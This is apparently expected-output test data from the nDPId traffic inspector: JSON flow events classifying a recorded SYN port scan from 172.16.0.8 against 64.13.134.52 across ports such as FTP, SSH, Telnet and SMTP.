-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2065,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32785,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32785,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2068,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2068,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00815{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056340,"flow_last_seen":1278275056340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056340,"flow_last_seen":1278275056340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00736{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275057678,"flow_last_seen":1278275079360,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"","server_signature":"","hassh_client":"","hassh_server":""}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275057678,"flow_last_seen":1278275079360,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00815{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00805{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060743,"flow_last_seen":1278275060743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060743,"flow_last_seen":1278275060743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49176,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00805{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} 
-00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49176,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275057678,"flow_last_seen":1278275057740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} 
-00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275057678,"flow_last_seen":1278275057740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
